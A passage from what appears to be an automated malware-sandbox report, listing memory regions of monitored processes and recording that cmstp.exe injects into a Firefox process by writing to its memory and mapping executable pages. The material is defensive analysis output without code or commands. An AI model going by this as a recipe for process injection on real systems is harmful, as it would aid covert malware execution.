| ole32.dll | 0x7feffa40000 | 0x7feffc42fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7feffc50000 | 0x7feffd7cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feffd80000 | 0x7feffe56fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x7feffe60000 | 0x7feffeb1fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7feffec0000 | 0x7feffec7fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007fffffaa000 | 0x7fffffaa000 | 0x7fffffabfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffac000 | 0x7fffffac000 | 0x7fffffadfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffae000 | 0x7fffffae000 | 0x7fffffaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffda000 | 0x7fffffda000 | 0x7fffffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdc000 | 0x7fffffdc000 | 0x7fffffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Process #30: firefox.exe
3
0
| Information | Value |
|---|---|
| ID | #30 |
| File Name | c:\program files (x86)\mozilla firefox\firefox.exe |
| Command Line | "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:04:26, Reason: Child Process |
| Unmonitor | End Time: 00:04:30, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb38 |
| Parent PID | 0x9cc (c:\windows\syswow64\cmstp.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
658
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00062fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x000affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000b0000 | 0x000b0000 | 0x001b9fff | Pagefile Backed Memory | rwx |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x003b0000 | 0x00416fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000420000 | 0x00420000 | 0x005a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x00790fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000008a0000 | 0x008a0000 | 0x008affff | Private Memory | rw |
|
|
|
- |
| firefox.exe | 0x009e0000 | 0x00a23fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x00000000009e0000 | 0x009e0000 | 0x00a23fff | Pagefile Backed Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000a30000 | 0x00a30000 | 0x013f3fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001400000 | 0x01400000 | 0x027fffff | Pagefile Backed Memory | r |
|
|
|
- |
| ntdll.dll | 0x02800000 | 0x0297ffff | Memory Mapped File | rwx |
|
|
|
- |
| nss3.dll | 0x74b90000 | 0x74d44fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp100.dll | 0x74f80000 | 0x74fe8fff | Memory Mapped File | rwx |
|
|
|
- |
| winmm.dll | 0x74ff0000 | 0x75021fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr100.dll | 0x75030000 | 0x750edfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| mozglue.dll | 0x756a0000 | 0x756c1fff | Memory Mapped File | rwx |
|
|
|
- |
| wsock32.dll | 0x75730000 | 0x75736fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x76450000 | 0x76484fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x77df0000 | 0x77df5fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00000000fffb0000 | 0xfffb0000 | 0xfffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000fffdb000 | 0xfffdb000 | 0xfffddfff | Private Memory | rw |
|
|
|
- |
| private_0x00000000fffde000 | 0xfffde000 | 0xfffdefff | Private Memory | rw |
|
|
|
- |
| private_0x00000000fffdf000 | 0xfffdf000 | 0xfffdffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000fffe0000 | 0xfffe0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #22: c:\windows\syswow64\cmstp.exe | 0xb0 | address = 0xa30000, size = 10240000 |
|
1 | |
| Modify Memory | #22: c:\windows\syswow64\cmstp.exe | 0xb0 | address = 0xb0000, size = 1089536 |
|
1 | |
| Modify Memory | #22: c:\windows\syswow64\cmstp.exe | 0xb0 | address = 0x9e0000, size = 278528 |
|
1 |
Host Behavior
File (1)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | \??\C:\Windows\SysWOW64\ntdll.dll | desired_access = FILE_EXECUTE, FILE_READ_ATTRIBUTES, READ_CONTROL, SYNCHRONIZE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE |
|
1 |
Module (2)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Mapping | - | protection = PAGE_EXECUTE, maximum_size = 0 |
|
1 | |
| Map | - | process_name = c:\program files (x86)\mozilla firefox\firefox.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x2800000 |
|
1 |
